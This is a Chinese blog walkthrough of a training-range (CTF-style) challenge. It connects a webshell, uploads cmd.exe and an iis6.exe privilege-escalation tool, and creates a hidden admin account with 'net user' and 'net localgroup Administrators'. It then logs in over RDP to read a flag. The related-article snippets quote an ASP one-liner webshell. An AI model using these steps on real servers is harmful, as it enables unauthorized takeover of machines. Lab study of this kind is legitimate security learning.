封神台 第五章:SYSTEM!POWER!(webshell控制目标 )

最新推荐文章于 2024-08-09 11:03:09 发布
最新推荐文章于 2024-08-09 11:03:09 发布
阅读量1k 收藏 7
点赞数 1
分类专栏: 封神台靶场 文章标签: 服务器 windows web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127414291
版权

一、进入传送门 发现和上题开始一样 

  1.我们使用菜刀(蚁剑搞终端一直失败,不知道为啥,可能是我太捞了...)和蚁剑效果一样

webshell:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。

2.上传

地址是带木马的url,a是我们一句话木马里面引用的内容,脚本类型ASP,字符编码GB2312

连接成功

3. 打开c盘下的flag.txt,不出意外的话,肯定没有权限......

没有权限的话,我们能够想到命令行cmd,是个提权的好方法,返回菜刀目录,右键打开虚拟终端,看看我是谁 whoami 很遗憾拒绝访问....

所以我们还要回文件中找到有用的信息

5.我们打开D盘目录RECYCLER文件夹

recycler(根文件)是windows系列操作系统所用的文件夹,其主要用途是放置被用户删除的文件。

这是我们看到有cmd.exe iis6.exe ,他居然红了,我们想想,什么是红色的,没错,是病毒!!!

 

 如果打开文件没有cmd.exe iis6.exe ,这两个都在d盘05这个文件夹里面。

 我们只能下载文件,不能复制粘贴,还是没有权限,下载的时候把杀毒软件一关,火绒什么的。

 

 下载完成上传就可以了

 

6.从根文件夹进入终端cmd

进入终端

 

查看whoami,我们还是普通用户,

 7.提权

这时要cd .. 到上一层根目录用iis6.exe 来查看权限,找到权限用户为System

iis6.exe "whoami"

使用其创建账户:a 密码:1

net user a 1 /add

 创建成功以后对账号提权至Administrator组

iis6.exe "net localgroup Administrators a /add"

 

 查看新建账号:a 的权限,成功获得最高权限

iis6.exe "net user a"

我们接下来要做的就是远程连接

用tasklist -svc命令查看了这台服务器开启的服务,发现远程桌面服务Termservice的pid是2408

在使用netstat -ano查看端口和连接状态,显示pid=2408所对应的端口号是3389,状态是正在监听,是打开着的,也就是说远程桌面服务的端口号是3389。

 

8.远程连接

题目的ip地址+prot端口连接其服务器

 

打开脑子---C盘----flag 

 

 

最后打开任务管理器,以注销的方式离开。不然下一个小伙伴进去的时候可能会显示终端服务超过连接值。

flag = zkz{F3ck_power_3y3stem}

橙子学不会.
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台靶场-第五章
Mr_helloword的博客
07-11 1822
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1096
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
神台----尤里的复仇I-第六章:SYSTEM!POWER
正在学习的路上...
07-19 1481
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
第五章:SYSTEM,POWER
m0_48294281的博客
01-05 1102
靶场学习心得,欢迎交流!
第五章:SYSTEM!POWER
m0_51195235的博客
02-06 262
第五章:SYSTEM!POWER
神台----尤里的复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1915
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台-第5章 绕过防护上传木马
ploto_cs的博客
09-27 708
神台-第5章 绕过防护上传木马 1.登录后台 获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了 键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在这个页面按F12 进入存储界面,更改name和value字段 将ADMINSESSIONIDCSTRCSDQ粘贴在Name下 将LBMLMBCCNPFINOANFGLPCFBC粘贴在value 修改成功后刷新点击“准备好了吗” 进入以下页
神台第五章提权
ma963852的博客
03-31 4435
首先拿到webshell,终端拒绝访问。 重新上传cmd.exe文件至服务器。 右击-虚拟终端 新建一个用户试试还是拒绝访问 因为使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell 上传完成切换到此路径 通过iis6.exe执行命令 接着创建新用户 命令执行成功,查看新建用户 用户为users组成员,将其添加至管理员...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
虚拟主机webshell提权!!!!!!!!!!
10-01
### 虚拟主机安全加固:WebShell与提权威胁 在当前网络环境中,虚拟主机的安全性显得尤为重要。本文将围绕“虚拟主机WebShell提权”这一主题展开,详细介绍如何在Windows虚拟主机环境下,特别是针对ASP + ...
网站后台拿Webshell
01-13
webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑删除,上传或者下载,查看文件 攻击者也可以通过这个webshell服务器进行提权,提权成功后,会得到服务器管理权限。拿...
第06篇:10款Webshell查杀工具1
08-03
Webshell查杀工具是网络安全领域中的重要组成部分,主要用于检测和清除服务器上可能存在的Webshell后门,这些后门通常由黑客植入,以便在系统中保持非法访问和控制。以下是对标题和描述中提及的10款Webshell查杀工具...
WebShellWebshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
mbp 神台靶场 五 (笔记)
qq_43558415的博客
02-09 865
打开链接,发现需要使用上一关的cookie,删除flag并复制放入modheader中即可。 或者用burp抓包替换cookie都可以,登录进去显示管理系统界面。 看了题目的提示,需要上传脚本上去,搞到它的后台。点开各个页面,发现里面有可以上传的地方。 便准备写一个一句话木马上传试一试,新建一个1.txt文件,输入<% eval request('mac') %>即可,并将后缀名改为1...
webshell控制目标:对服务器进行提权以访问远程服务器
Zeker62的博客
08-03 878
什么是提权 提权是提取/提高权限的意思 一般作为访问者,权限比较低,需要提高权限进一步操作。 最想拥有的是管理员的权限。 提权原理: 访问服务器的时候,直接访问一般权限很低。 这个时候我们可以通过一些权限比较高的软件/用户/进程等来操作我们的账户,让我们账户的权限提高。 EXP和POC exp:是指漏洞可以利用代码,运行后直接利用相应的漏洞 poc:是指漏洞可以验证代码,检测是否存在漏洞。 提权过程 靶场:神台:https://hack.zkaq.cn/battle/target?id=3eb7bec
Windows驱动编程基础(下)之电源管理
zhaopeng01zp的博客
04-27 2797
Windows驱动编程基础(下)第五章 电源管理电源管理概况电源状态的上升和下降 第五章 电源管理 电源管理概况 SystemPowerState系统电源状态到DevicePowerState设备电源状态的转换: 假设我们的设备当前处于工作状态,操作系统的电源管理器PM想把我们的设备置为休眠状态,这个时候PM会发IRP_MN_QUERY_POWER这么一个IRP发给我们的驱动,这个IRP带的消息是把设备的电源用电量降低: 这个IRP的输入参数是IO_STACK_LOCATION中的Parameters
神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
feiniaotjx的博客
10-20 9352
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳!
神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4669
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
挖矿木马攻破了服务器
最新发布
中年程序员一枚的博客
08-09 586
systemctl status 6058 # 6058为病毒的PID。然后干掉,或者权限屏蔽等都可以,只要不执行,就没有危险!过一分钟后,服务又开始狂刷cpu。最近被国外的挖矿木马攻破了服务器。#top 看看什么占用cpu高。第四步根据pid查到服务地址。#last指令查看登录ip。第三步杀死狂刷CPU的服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值